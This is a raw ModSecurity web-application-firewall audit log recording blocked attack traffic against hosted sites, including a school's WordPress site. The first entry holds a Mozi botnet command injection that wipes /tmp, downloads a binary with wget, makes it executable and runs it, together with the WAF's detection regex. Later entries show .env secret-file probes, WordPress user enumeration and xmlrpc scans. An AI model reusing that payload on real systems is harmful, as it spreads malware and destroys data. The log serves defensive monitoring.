/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 120.86.236.60 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 120.86.236.60 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --f29eb30b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29eb30b-E-- --f29eb30b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://192.168.1.1:8088/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746371117225101 2253 (- - -) Stopwatch2: 1746371117225101 2253; combined=671, p1=468, p2=171, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f29eb30b-Z-- --b6527e66-A-- [04/May/2025:22:26:56 +0700] aBeHQPnZiHJYHUAF8QfmrAAAAAw 103.236.140.4 38842 103.236.140.4 8181 --b6527e66-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.136.184 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b6527e66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6527e66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746372416566370 865 (- - -) Stopwatch2: 1746372416566370 865; combined=324, p1=284, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6527e66-Z-- --fbffc60e-A-- [04/May/2025:22:53:03 +0700] aBeNX2JEE9ao5dcyYWn6PAAAAIw 103.236.140.4 39750 103.236.140.4 8181 --fbffc60e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; CPH1801) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --fbffc60e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbffc60e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746373983424262 879 (- - -) Stopwatch2: 1746373983424262 879; combined=412, p1=370, p2=0, p3=0, p4=0, p5=42, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbffc60e-Z-- --a1cf0764-A-- [04/May/2025:23:37:01 +0700] aBeXrechPF6irSergtsHkQAAAM4 103.236.140.4 43896 103.236.140.4 8181 --a1cf0764-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 138.68.82.23 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a1cf0764-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1cf0764-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746376621941309 865 (- - -) Stopwatch2: 1746376621941309 865; combined=335, p1=293, p2=0, p3=0, p4=0, p5=42, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1cf0764-Z-- --d073e737-A-- [04/May/2025:23:42:17 +0700] aBeY6fnZiHJYHUAF8QfqNgAAABU 103.236.140.4 43918 103.236.140.4 8181 --d073e737-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d073e737-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d073e737-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746376937887765 3231 (- - -) Stopwatch2: 1746376937887765 3231; combined=1377, p1=487, p2=859, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d073e737-Z-- --00753c5e-A-- [04/May/2025:23:42:22 +0700] aBeY7vnZiHJYHUAF8QfqOAAAABY 103.236.140.4 43922 103.236.140.4 8181 --00753c5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --00753c5e-C-- demo.sayHello --00753c5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --00753c5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746376942132952 5451 (- - -) Stopwatch2: 1746376942132952 5451; combined=4099, p1=529, p2=3360, p3=28, p4=31, p5=90, sr=91, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00753c5e-Z-- --f3032563-A-- [04/May/2025:23:42:48 +0700] aBeZCPnZiHJYHUAF8QfqOwAAAAE 103.236.140.4 43928 103.236.140.4 8181 --f3032563-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3032563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3032563-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746376968146837 2340 (- - -) Stopwatch2: 1746376968146837 2340; combined=1360, p1=452, p2=876, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3032563-Z-- --f8fbc52e-A-- [04/May/2025:23:42:52 +0700] aBeZDPnZiHJYHUAF8QfqPQAAABQ 103.236.140.4 43932 103.236.140.4 8181 --f8fbc52e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.60 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8fbc52e-C-- demo.sayHello --f8fbc52e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8fbc52e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746376972161189 4830 (- - -) Stopwatch2: 1746376972161189 4830; combined=3782, p1=467, p2=3117, p3=25, p4=24, p5=88, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8fbc52e-Z-- --916fd33d-A-- [04/May/2025:23:42:57 +0700] aBeZEfnZiHJYHUAF8QfqPwAAAAA 103.236.140.4 43936 103.236.140.4 8181 --916fd33d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --916fd33d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --916fd33d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746376977449134 2083 (- - -) Stopwatch2: 1746376977449134 2083; combined=1030, p1=365, p2=639, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --916fd33d-Z-- --9b6ff76b-A-- [04/May/2025:23:43:00 +0700] aBeZFPnZiHJYHUAF8QfqQQAAAAg 103.236.140.4 43940 103.236.140.4 8181 --9b6ff76b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.73.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.73.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9b6ff76b-C-- demo.sayHello --9b6ff76b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b6ff76b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746376980989518 4641 (- - -) Stopwatch2: 1746376980989518 4641; combined=3627, p1=445, p2=2985, p3=22, p4=24, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b6ff76b-Z-- --d23b7475-A-- [04/May/2025:23:43:27 +0700] aBeZL-chPF6irSergtsHkwAAAM0 103.236.140.4 43952 103.236.140.4 8181 --d23b7475-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d23b7475-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d23b7475-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377007317030 3084 (- - -) Stopwatch2: 1746377007317030 3084; combined=1364, p1=455, p2=879, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d23b7475-Z-- --d350e017-A-- [04/May/2025:23:43:32 +0700] aBeZNOchPF6irSergtsHlQAAANM 103.236.140.4 43956 103.236.140.4 8181 --d350e017-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d350e017-C-- demo.sayHello --d350e017-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d350e017-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377012498626 5274 (- - -) Stopwatch2: 1746377012498626 5274; combined=3956, p1=475, p2=3261, p3=29, p4=26, p5=96, sr=71, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d350e017-Z-- --fe501846-A-- [04/May/2025:23:43:36 +0700] aBeZOOchPF6irSergtsHlgAAANE 103.236.140.4 43960 103.236.140.4 8181 --fe501846-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe501846-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe501846-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377016359344 2181 (- - -) Stopwatch2: 1746377016359344 2181; combined=997, p1=351, p2=607, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe501846-Z-- --bc48b530-A-- [04/May/2025:23:43:42 +0700] aBeZPuchPF6irSergtsHmAAAANI 103.236.140.4 43964 103.236.140.4 8181 --bc48b530-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bc48b530-C-- demo.sayHello --bc48b530-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc48b530-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377022214363 4723 (- - -) Stopwatch2: 1746377022214363 4723; combined=3625, p1=449, p2=2974, p3=25, p4=26, p5=89, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc48b530-Z-- --fef3887e-A-- [04/May/2025:23:43:49 +0700] aBeZRdsVQyl9V2B8Pt_EewAAAFA 103.236.140.4 43968 103.236.140.4 8181 --fef3887e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fef3887e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fef3887e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377029888867 3421 (- - -) Stopwatch2: 1746377029888867 3421; combined=1584, p1=515, p2=1023, p3=0, p4=0, p5=46, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fef3887e-Z-- --4208182a-A-- [04/May/2025:23:43:54 +0700] aBeZSvnZiHJYHUAF8QfqRQAAAAQ 103.236.140.4 43972 103.236.140.4 8181 --4208182a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4208182a-C-- demo.sayHello --4208182a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4208182a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746377034898287 5287 (- - -) Stopwatch2: 1746377034898287 5287; combined=3872, p1=447, p2=3216, p3=23, p4=26, p5=94, sr=63, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4208182a-Z-- --a698007c-A-- [04/May/2025:23:44:20 +0700] aBeZZGJEE9ao5dcyYWn61gAAAIY 103.236.140.4 43984 103.236.140.4 8181 --a698007c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a698007c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a698007c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746377060889229 2870 (- - -) Stopwatch2: 1746377060889229 2870; combined=1312, p1=441, p2=839, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a698007c-Z-- --d3afd31d-A-- [04/May/2025:23:44:25 +0700] aBeZaWJEE9ao5dcyYWn62AAAAIE 103.236.140.4 43988 103.236.140.4 8181 --d3afd31d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.9 X-Forwarded-Host: smkn22-jkt.sch.id 